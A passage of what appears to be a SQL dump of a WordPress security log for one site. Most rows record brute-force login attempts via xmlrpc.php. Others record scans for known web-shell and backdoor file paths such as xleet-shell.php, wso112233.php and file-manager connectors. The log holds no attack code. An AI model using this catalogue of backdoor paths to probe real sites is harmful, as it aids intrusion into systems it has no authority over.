UmtERHCaMDePkBxs4lr2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'wpupdateuser',0,1679995845.0778,152,'0ikK5aRFqBI6vbNtPhryw4oT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'admin',0,1679995860.1143,152,'yGRwD1fUHkCj2pbcuv3BhdAW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'',0,1679995860.1165,10,'yGRwD1fUHkCj2pbcuv3BhdAW','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('8.210.217.51',148035891,'demo',0,1679998601.5988,152,'JtycQrC5NeBjkb8T1dIGxRhP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'admin',0,1679998603.4214,152,'j2Imp6Uo9ATPCONDhfyEil4q','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.231.8',3326600968,'admin',0,1679998604.5093,152,'xyZS1E8fb3XvghdAR65BFutK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.32.234.87',2552293975,'comprasexpress',0,1679998613.9767,152,'ZwQOVUbxis7BeDYK6RSaN4tL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.41.217.33',2938755361,'Admin',0,1679998614.4216,152,'s2XS54OWVho8uREZGejkITxz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.41.217.33',2938755361,'Admin',0,1679998621.7025,152,'mzKav2AlGUX358xHNBtboik4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.41.217.33',2938755361,'',0,1679998621.7045,10,'mzKav2AlGUX358xHNBtboik4','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('37.97.226.64',627171904,'admin',0,1680005364.4883,152,'duio9lJwjagx176BEZ4LM3QW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'admin',0,1680005371.2410,152,'ZRuHpCEVTJ3j4G58nvzAdkob','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.89.43',1386567979,'admin',0,1680005371.4070,152,'GlIKcME9hDjfkuxNypC1iRSw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.172.150.73',581736009,'admin',0,1680005373.4689,152,'x6unvEOqkZAz9QLGpfdHcoly','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'admin',0,1680005378.8308,152,'wodyc05hpEB8kYWx1jrflVmT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'admin',0,1680005382.4841,152,'WA8QiFGjEb9kDXYgPvtC0meu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.243.11.71',3119713095,'roottn',0,1680005389.9486,152,'VWkPFiIfcBJUjXnuv3s47169','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.198.116.43',1137079339,'Melissa',3,1680008672.2983,5,'Xe1pHBh2w4yk58EGbjIfz6Ox','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,3),('194.38.23.179',3257276339,'',0,1680008930.7503,55,'qNoJnt6uFcLkb2xTl18gCfew','','19|0|0|0|cmdev-site1.com/admin/jQuery-File-Upload/server/php/index.php',0,19,0),('103.86.47.5',1733701381,'Admin',0,1680010885.5307,152,'Wsut1qrUjhbEXep9gzJ3HdRv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.59.202',1255160778,'admin',0,1680010886.6871,152,'pzxd2XCFUoskrZguEmj76PYb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.163.160.40',3265503272,'admin',0,1680010895.7835,152,'qKnbmY34Ox7Suj62ztl9AHVs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'admin',0,1680010904.0333,152,'ST061ohXtwbUE5sRBPcnzmfq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('206.189.136.160',3468527776,'admin',0,1680010905.0911,152,'6spaVg4MynvFfbc9CJYe5BPR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.154.142.51',731549235,'admin',0,1680010906.8287,152,'F9tSJhBRTC43E7HY8qeUgPlf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'admin',0,1680010921.0374,152,'q1NKTZDsjX93hw6JB5V2Cfoc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'',0,1680010921.0418,10,'q1NKTZDsjX93hw6JB5V2Cfoc','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('198.71.235.41',3326602025,'admin',0,1680014485.6848,152,'ibXQoBaFJHj9SRN4tcTWe3Y7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.97.226.64',627171904,'admin',0,1680014488.0548,152,'DMhjrFKb4NO7coqkEYzfCsmn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('176.126.165.71',2961089863,'admin',0,1680014490.4159,152,'AHyczoviD0NI5VCsX2ZK3qgu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'admin',0,1680014492.1651,152,'zAgyYO6roZuXIUV59EJieGbp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.231.215.101',2917652325,'admin',0,1680014503.2638,152,'TSMDWElwC0n7ryt3xBfzuVQY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.65.248.18',1380055058,'admin',0,1680014503.8719,152,'QvROnfPrTagyU6ktS4dX2iEl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'jannat',0,1680014508.6543,152,'apRqv8XsKzgMy1JBA0FjU5uI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.107.213.64',3110851904,'admin',0,1680014515.1658,152,'3Dt0wodUOSY4uXAyGClRK1aJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.210.67.162',3000124322,'admin',0,1680014522.8406,152,'OqF8PGTsw7a6K1jguAm5ikRv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.81.223.229',1548869605,'admin',0,1680014524.4573,152,'SFOEYpil7AsRICgxreH3M6ZJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.217.51',148035891,'Admin',0,1680014525.3566,152,'M2yVD6oastW3vFwKd0BENP8f','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.226.45',3326599725,'Admin',0,1680019130.7427,152,'ZlF3dnJQb7Dy6HEtszKG9XpO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.132.64',1109230656,'admin',0,1680019135.0413,152,'ZCBwWSLqYUoQgF4PmxkcXyni','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.65.248.18',1380055058,'admin',0,1680019138.7865,152,'uctO3rDGPwpNbnSZdTyzjKYC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.97.226.64',627171904,'aadmin',0,1680019148.6987,152,'QYRMGPT0Zzi1XEsuL4D9qFpa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.98.17',3098042897,'admin',0,1680019152.4717,152,'UAoufCjGxJ4WirDsFk20XqQ5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.172.150.73',581736009,'admin',0,1680019170.7599,152,'mWOHpc8JaRKQjbvXdehulkI1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.185.76.79',599346255,'gestore',0,1680021810.6237,152,'THZt0Bk8PAgGa2iFUKYnSO9X','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'admin',0,1680021810.6426,152,'19mukl3JILQf5hz8WAvOprsG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.46.110.197',1496215237,'Admin',0,1680021812.2698,152,'gxsPbThy7MnwOG2aSUH6LQpl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.57.16',3115727120,'admin',0,1680021815.6936,152,'EWpLxmv76syetPKhdzc0aNgI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'guest',0,1680021822.7305,152,'xtXE6IZTwJLd0c7fBkyQz1G9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'',0,1680021822.7329,10,'xtXE6IZTwJLd0c7fBkyQz1G9','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('39.104.85.137',661149065,'admin',0,1680021828.1332,152,'jWA0xQHB3d4ZJuGOt9RNCnqv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('120.27.216.32',2015090720,'admin',0,1680021836.5836,152,'rl8vzw7kWynQhTY4eZqFPjVm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.77',1152553293,'Admin',0,1680021840.1991,152,'TIe4ayqE92xnthXuM0kJOvlQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.187.109.22',599485718,'admin',0,1680021846.2930,152,'CHXKARma9GuNZnPWb12eVkTi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.192.5.191',1757414847,'administrator',0,1680021847.8434,152,'ehmwZENSpCuj4cGWALnibqQF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'admin',0,1680026166.1814,152,'LRJUyr84uIA1ml2opG9PEjx5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'admin',0,1680026166.9016,152,'xia2j5syPcHOoqFtwSm6bzQD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.99.50',3098043186,'globalint',0,1680026172.8394,152,'G1lXUxSt2bsgQiAFNvMDeayC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'-',0,1680026173.7865,152,'4wjhXn61cWyLkgilKJMe2puP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.46.106.145',1496214161,'admin',0,1680026183.6447,152,'gYo2ztrPe3SVauU0NyBEJKXf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.29.218',861609434,'admin',0,1680026190.3057,152,'YGhfXurVH6OkZBogWUjl4iNp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.172.150.73',581736009,'admin',0,1680026193.8717,152,'jqvZ80YiJ5Tsp6n1GVRLKWrz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'admin',0,1680026194.5831,152,'iaN0PFyYOodx4XEkDusqBwIT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'',0,1680026194.5864,10,'iaN0PFyYOodx4XEkDusqBwIT','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('95.167.178.158',1604825758,'admin1',0,1680026201.3789,152,'K9vLGx5mZ0hCpOzI6VgnPab8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.31.79.172',3105836972,'manager',0,1680028639.8122,152,'6U0GwPagnNVf8yKmu2IYBe4Z','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.172.150.73',581736009,'aaa',0,1680028639.8121,152,'46V2CrxRfN1gm8cj3sZAtTok','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.5.199',1556940231,'admin',0,1680028640.8019,152,'JtsScR1FNKfXlPOo9DEqBe32','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.253.54.78',2734503502,'Admin',0,1680028650.9913,152,'iMZNUWlACk4fdyVBsSa9vGpF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.154.142.51',731549235,'admin',0,1680028661.1062,152,'3C71uosJ4yA9VSrQHNjdOxmI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'',0,1680028676.3750,71,'w2xXqpBCcdNrsmYKeoFWUA6T','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('198.71.231.8',3326600968,'laura',0,1680028676.9486,152,'sXqlrwOC26xe7EmuBZaGDQKg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.253.54.78',2734503502,'tashi',0,1680031588.9469,152,'HajMNvqD3EOxuJGBTbpZ9l2e','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.81.223.229',1548869605,'admin',0,1680031592.3490,152,'4acldNBZ615Mv9TPbpX0Q8Kw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('147.78.47.249',2471374841,'',0,1680037074.6192,55,'08SPwN6ktuYm7VxBQLRJfDh2','','19|0|0|0|mail.cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('40.80.83.88',676352856,'',0,1680107372.5710,18,'OnP4xAq9tIBTzG5Q1dfi8jaE','','13|0|0|0|cmdev-site1.com/wp-plain.php',0,13,0),('40.80.83.88',676352856,'',0,1680107374.2399,18,'0WsU7nghLBZYa9MSmEPJ2V4D','','13|0|0|0|cmdev-site1.com/alfacgiapi/perl.alfa',0,13,0),('40.80.83.88',676352856,'',0,1680107375.1982,100,'oR1gyH6ZEPbms2vSn5jriXdQ','','13|0|0|0|cmdev-site1.com/wp-content/plugins/apikey/apikey.php',0,13,0),('40.80.83.88',676352856,'',0,1680107375.8896,100,'pnR5erhDmgGUK0ABxjHCEZP7','','13|0|0|0|cmdev-site1.com/plugins/content/apismtp/apismtp.php',0,13,0),('40.80.83.88',676352856,'',0,1680107376.6293,100,'nCrtfXJoHM0ZNLIbpSueBGA6','','13|0|0|0|cmdev-site1.com/wp-content/plugins/apikey/apikey.php.suspected',0,13,0),('40.80.83.88',676352856,'',0,1680107377.3321,100,'tpr5idj3CFqHb9fXSV7zUxk2','','13|0|0|0|cmdev-site1.com/plugins/content/apismtp/apismtp.php.suspected',0,13,0),('165.232.168.48',2783488048,'',0,1680137273.7708,55,'epSlCftgbrOQqaB2o34sKhFY','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php',0,19,0),('165.232.168.48',2783488048,'',0,1680138212.1196,100,'UkqA9B8RPQXFImpK65crgD3a','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('165.232.168.48',2783488048,'',0,1680138213.3917,100,'8qdZg3t57IELGzlUiAKSabPF','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('165.232.168.48',2783488048,'',0,1680144797.9610,55,'5g3KMlGxt6hF8V1cWBj29spE','','19|0|0|0|cmdev-site1.com/wp-includes/class-index-wordpress.php',0,19,0),('165.232.168.48',2783488048,'',0,1680144799.0426,55,'c3dWBZMSfeYDTots5h4yRial','','19|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,19,0),('165.232.168.48',2783488048,'',0,1680144799.0451,10,'c3dWBZMSfeYDTots5h4yRial','','707|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,707,0),('165.232.168.48',2783488048,'',0,1680144800.0880,55,'HZq1Skv7jFnVfhBuKpyLMoXl','','19|0|0|0|cmdev-site1.com/wp-includes/wp-system-cloud.php',0,19,0),('165.232.168.48',2783488048,'',0,1680144801.1299,55,'d75IVErLPAT0awFoxSGNRmZB','','19|0|0|0|cmdev-site1.com/wp-includes/class-wp-page-icon.php',0,19,0),('165.232.168.48',2783488048,'',0,1680144802.1287,55,'u1wZc5PL7NRebsOkFhyTXSDm','','19|0|0|0|cmdev-site1.com/wp-includes/class-wordpress-license.php',0,19,0),('5.62.58.233',87964393,'',0,1680195034.1279,55,'s2RqMw8lbCLej6AQ4dWyp9KI','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('5.62.58.233',87964393,'',0,1680195034.1300,10,'s2RqMw8lbCLej6AQ4dWyp9KI','','707|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,707,0),('185.129.248.170',3112302762,'',0,1680213379.8524,10,'CsdOtAD2EZPbK9BjUG68zawv','','707|0|0|0|cmdev-site1.com/wp-includes/certificates/class_api.php',0,707,0),('122.155.3.106',2056979306,'',0,1680213383.4720,55,'jHJdpIVGfvUBWbthm2uaQlAx','','19|0|0|0|cmdev-site1.com/use.php',0,19,0),('122.155.3.106',2056979306,'',0,1680213415.0021,55,'LHIPfim9tCl2qbhVNFBvj7dg','','19|0|0|0|cmdev-site1.com/admin.php',0,19,0),('122.155.3.106',2056979306,'',0,1680213415.0041,10,'LHIPfim9tCl2qbhVNFBvj7dg','','707|0|0|0|cmdev-site1.com/admin.php',0,707,0),('185.129.248.170',3112302762,'',0,1680213416.8055,100,'27nrS0Wlk5XRZvImNfhwUTHd','','13|0|0|0|cmdev-site1.com/class.api.php',0,13,0),('122.155.3.106',2056979306,'',0,1680213465.6266,100,'XlgOUCamDTEZnicNuP7dFLft','','13|0|0|0|cmdev-site1.com/use.php',0,13,0),('167.71.192.36',2806497316,'',0,1680222932.5131,55,'y2OrJ7DWcjKFNgVmSLUI6xdo','','19|0|0|0|cmdev-site1.com/wp-content/plugins/anttt/simple.php',0,19,0),('167.71.192.36',2806497316,'',0,1680222933.5446,55,'hXius1fT4xNO70jRcWtKIU9V','','19|0|0|0|cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php',0,19,0),('167.71.192.36',2806497316,'',0,1680222933.5474,10,'hXius1fT4xNO70jRcWtKIU9V','','707|0|0|0|cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php',0,707,0),('167.71.192.36',2806497316,'',0,1680222934.4168,55,'Wy8E6NRGnghI5j7iQYadMuXr','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php',0,19,0),('167.71.192.36',2806497316,'',0,1680222935.4751,55,'KZ8tp346c7himy0okxJgHuNP','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php',0,19,0),('167.71.192.36',2806497316,'',0,1680223100.0870,100,'Z8F45iAeMn2zVmxLXfckdCaT','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('167.71.192.36',2806497316,'',0,1680223101.1106,100,'hQEAynYoFB0XelfmwrG8NZM3','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('167.71.192.36',2806497316,'',0,1680224051.8480,55,'4ixQajwGmIXMKPuzOVodJDBl','','19|0|0|0|cmdev-site1.com/wp-includes/class-index-wordpress.php',0,19,0),('167.71.192.36',2806497316,'',0,1680224052.9533,50,'hwpjvC80qugxHSIZPGOy5TXW','','10|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,10,0),('167.71.192.36',2806497316,'',0,1680224052.9540,55,'hwpjvC80qugxHSIZPGOy5TXW','','19|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,19,0),('167.71.192.36',2806497316,'',0,1680224054.0596,55,'uU59MYBbqc3ZdSpQrasK4XtE','','19|0|0|0|cmdev-site1.com/wp-includes/wp-system-cloud.php',0,19,0),('167.71.192.36',2806497316,'',0,1680224055.1033,55,'mIrSJl0u4Y3KOeNZRw8EWyVQ','','19|0|0|0|cmdev-site1.com/wp-includes/class-wp-page-icon.php',0,19,0),('167.71.192.36',2806497316,'',0,1680224056.0914,55,'MiZ1yxufS5mnJQEHa4FeCzBs','','19|0|0|0|cmdev-site1.com/wp-includes/class-wordpress-license.php',0,19,0),('167.71.192.36',2806497316,'',0,1680239338.3132,55,'9JnfLVFN85tuQhq0bZdyrzwp','','19|0|0|0|cmdev-site1.com//wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php',0,19,0),('167.71.192.36',2806497316,'',0,1680239339.1566,56,'ePJKhd6OWVYx8UfQNpmg50t2','','51|0|0|0|cmdev-site1.com//wp-content/plugins/apikey/apikey.php',0,51,0),('167.71.192.36',2806497316,'',0,1680239339.1590,10,'ePJKhd6OWVYx8UfQNpmg50t2','','707|0|0|0|cmdev-site1.com//wp-content/plugins/apikey/apikey.php',0,707,0),('167.71.192.36',2806497316,'',0,1680239340.0371,55,'q1Xns9zWvumRfObkpl45xahy','','19|0|0|0|cmdev-site1.com//wp-content/plugins/apikey/a57bze8931.php',0,19,0),('167.71.192.36',2806497316,'',0,1680239342.1641,55,'yO054LQtfdCeY9XTNxE3G6uv','','19|0|0|0|cmdev-site1.com//wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php',0,19,0),('167.71.192.36',2806497316,'',0,1680239344.2960,55,'o1YVWhdTpLACJXKmbsD7n5Mx','','19|0|0|0|cmdev-site1.com//abruzi.php4',0,19,0),('167.71.192.36',2806497316,'',0,1680239346.2285,18,'aNgYFej8hbcsqoxmE9C31kJ0','','13|0|0|0|cmdev-site1.com//wp-content/x.php',0,13,0),('167.71.192.36',2806497316,'',0,1680239347.0744,55,'xKPYWOiDoXZ5G9qIEe04Sprf','','19|0|0|0|cmdev-site1.com//wp-content/king.php',0,19,0),('167.71.192.36',2806497316,'',0,1680239347.9483,55,'62jDuQOR8TA9CoE5t7msPeKg','','19|0|0|0|cmdev-site1.com//wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('167.71.192.36',2806497316,'',0,1680239348.7540,55,'oWRM41PqmjiJAvZ3nIQF2bfB','','19|0|0|0|cmdev-site1.com//wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php',0,19,0),('167.71.192.36',2806497316,'',0,1680248341.6554,55,'y94Ii251GgDfHtChAuQJcTdv','','19|0|0|0|cmdev-site1.com/wp/wp-admin/install.php',0,19,0),('167.71.192.36',2806497316,'',0,1680248342.5988,55,'0hWQ8GMYHbpeUcu16mzvZfBX','','19|0|0|0|cmdev-site1.com/new/wp-admin/install.php',0,19,0),('167.71.192.36',2806497316,'',0,1680248342.6019,10,'0hWQ8GMYHbpeUcu16mzvZfBX','','707|0|0|0|cmdev-site1.com/new/wp-admin/install.php',0,707,0),('167.71.192.36',2806497316,'',0,1680248343.4598,55,'nekjqQbvryxI7Omict2u4YLz','','19|0|0|0|cmdev-site1.com/old/wp-admin/install.php',0,19,0),('167.71.192.36',2806497316,'',0,1680248344.3660,55,'UVSId8h3bnNAE7q2YlyKuCWe','','19|0|0|0|cmdev-site1.com/wordpress/wp-admin/install.php',0,19,0),('167.71.192.36',2806497316,'',0,1680248345.2297,55,'RnU87PJXVtSiIa4wEMuLKGj5','','19|0|0|0|cmdev-site1.com/test/wp-admin/install.php',0,19,0),('167.71.192.36',2806497316,'',0,1680248346.0698,55,'joct3UrPfZa2pIL5mnJ19Cez','','19|0|0|0|cmdev-site1.com/blog/wp-admin/install.php',0,19,0),('167.71.192.36',2806497316,'',0,1680248346.9464,55,'VafIiALj2eSd35HURgMxXnzC','','19|0|0|0|cmdev-site1.com/cms/wp-admin/install.php',0,19,0),('167.71.192.36',2806497316,'',0,1680248347.8081,55,'S6LdRJy1C7sOTmXZxwG3Yhfc','','19|0|0|0|cmdev-site1.com/web/wp-admin/install.php',0,19,0),('167.71.192.36',2806497316,'',0,1680248348.6561,55,'NoCTweqhmA1fpUSRKGIW7xJH','','19|0|0|0|cmdev-site1.com/backup/wp-admin/install.php',0,19,0),('167.71.192.36',2806497316,'',0,1680248349.5030,55,'Ax1MlDd6RK7hwjsGXpNtC9mi','','19|0|0|0|cmdev-site1.com/site/wp-admin/install.php',0,19,0),('167.71.192.36',2806497316,'',0,1680248350.3922,55,'ySTeGx3uBgr5vaUJ8Pshl9Fq','','19|0|0|0|cmdev-site1.com/oldsite/wp-admin/install.php',0,19,0),('67.198.116.43',1137079339,'Melissa',3,1680263629.4952,5,'fPJTtBQHX7NMAoCxUaK1gvOm','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,3),('103.90.160.176',1733992624,'',0,1680266258.9296,55,'RfAl8icJySCtXQV90rDG4hFe','','19|0|0|0|cmdev-site1.com/Makhdamx.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266259.9351,55,'byhcvRUsfOaAdBmp1832x67L','','19|0|0|0|cmdev-site1.com/Makhdamx.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266259.9375,10,'byhcvRUsfOaAdBmp1832x67L','','707|0|0|0|cmdev-site1.com/Makhdamx.php',0,707,0),('103.90.160.176',1733992624,'',0,1680266260.9142,55,'frvPS5u7HokA8EtdR1b4XhwY','','19|0|0|0|cmdev-site1.com/database.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266261.9823,55,'zoxGDCTlLnA5vtpH2c9Sk7OK','','19|0|0|0|cmdev-site1.com/wp-commentin.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266263.0249,100,'1QvYMr2LJfXHxqiIE8u3lNtO','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('103.90.160.176',1733992624,'',0,1680266264.1169,55,'5P7TBeIY1td0fJgyLzUvwiOC','','19|0|0|0|cmdev-site1.com/xltavrat.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266265.2198,55,'RQ3WxHZTMF7hU4uOvno6gBDf','','19|0|0|0|cmdev-site1.com/wp-admin/includes/class-wp-media-list-data.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266266.3289,55,'1zCIAHZgkrULePuDad9Q58jB','','19|0|0|0|cmdev-site1.com/wp-content/plugins/seoplugins/index.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266267.4412,55,'t02rdgKWTRGo8nBCFPOyJQNm','','19|0|0|0|cmdev-site1.com/wso112233.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266268.5361,55,'UKcsYqb1rHDz8ydVLlmAjvJf','','19|0|0|0|cmdev-site1.com/xleet-shell.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266269.6057,55,'Xtpj5vClOVZfD3AQbBaSHr1T','','19|0|0|0|cmdev-site1.com/xleet.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266271.2032,55,'T9CwtPYqR2jQV841ISbhmBDg','','19|0|0|0|cmdev-site1.com/wp-content/plugins/seoplugins/mar.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266272.3462,55,'G7nQwJS9Uis2rgXzNkMEptWj','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/mar.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266273.4305,50,'BGtI1Ov6JUsEM8lVDxAanXfC','','10|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,10,0),('103.90.160.176',1733992624,'',0,1680266273.4310,55,'BGtI1Ov6JUsEM8lVDxAanXfC','','19|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266274.6448,55,'dyaA2FoqU7TzC4OWulBmXkNR','','19|0|0|0|cmdev-site1.com/0z.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266275.7498,55,'U7csGBAyOxr6uwlMt5IiV0No','','19|0|0|0|cmdev-site1.com/fw.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266276.9535,55,'uoDBpyZLIt1fXxj5qis0URhE','','19|0|0|0|cmdev-site1.com/wp-includes/wp-class.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266278.0111,55,'VahELZTJQpR1oKSBMAuvXgC9','','19|0|0|0|cmdev-site1.com/radio.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266279.2144,55,'xj8zI16qSpKdUXrb30wt2imZ','','19|0|0|0|cmdev-site1.com/i.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266280.3373,55,'g54ew3vRNDZayCp9HW07uXnE','','19|0|0|0|cmdev-site1.com/o.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266281.4067,55,'Pxvlw4j8J5b1uBCmXQkLaDNW','','19|0|0|0|cmdev-site1.com/alwso.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266282.8988,55,'0wAj3mUCYkhSBM5veitR6Xga','','19|0|0|0|cmdev-site1.com/wp-blog.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266283.9706,55,'kNyav2qKAhWVpezMs6QUiREZ','','19|0|0|0|cmdev-site1.com/u.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266285.0159,55,'yvNhUbcx3WknQSGI6Tfp7DVe','','19|0|0|0|cmdev-site1.com/templates/beez5/index.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266286.1484,55,'JaDToyh5v7OV3NgHfumEitd6','','19|0|0|0|cmdev-site1.com/mini.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266287.2936,55,'y72q1bozRG0r8VDwxHMnABI4','','19|0|0|0|cmdev-site1.com/x.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266288.4899,55,'G1yK39pJjrgmbQ7WDNOFBH0d','','19|0|0|0|cmdev-site1.com/404.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266289.6635,55,'0cESxpQhWLbNKlO69nJXIGgv','','19|0|0|0|cmdev-site1.com/13.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266290.8607,55,'fIMlo3gvATLudyZ9KPVYqr6C','','19|0|0|0|cmdev-site1.com/11index.php',0,